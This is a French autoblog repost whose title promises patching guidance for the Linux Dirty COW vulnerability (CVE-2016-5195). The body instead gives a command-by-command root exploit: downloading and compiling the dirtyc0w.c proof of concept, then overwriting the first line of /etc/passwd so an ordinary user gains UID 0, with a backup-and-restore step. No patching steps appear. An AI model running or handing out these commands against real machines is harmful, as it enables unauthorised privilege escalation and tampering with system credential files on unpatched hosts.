PROJET AUTOBLOG


Links

source: Links

⇐ retour index

How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]

lundi 24 octobre 2016 à 21:55
# /!\ Attention la manip suivante peux endommager votre système !
# Pour passer root:
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -lpthread dirtyc0w.c -o dirtyc0w
cat /etc/passwd
cp  /etc/passwd  /tmp/passwd.back
# sauvegardé de coté le contenu de /etc/passwd
# changer USER par votre utilisateur
# la ligne USER:x:0:0:root:/root:/bin/bash doit être de la même longueur que root:x:0:0:root:/root:/bin/bash
# si votre USER fait 3 caractères vous pouvez mettre : USER:x:0:10:root:/root:/bin/bash
# cela écrase la 1ère ligne de /etc/passwd
./dirtyc0w /etc/passwd USER:x:0:0:root:/root:/bin/bash

# Il ne vous reste plus qu'à vous connecter avec votre USER.
# Vous avez maintenant les droits root. Restaurez la sauvegarde de /etc/passwd
cp  /tmp/passwd.back /etc/passwd

via https://links.yome.ch/?ykfVig
(Permalink)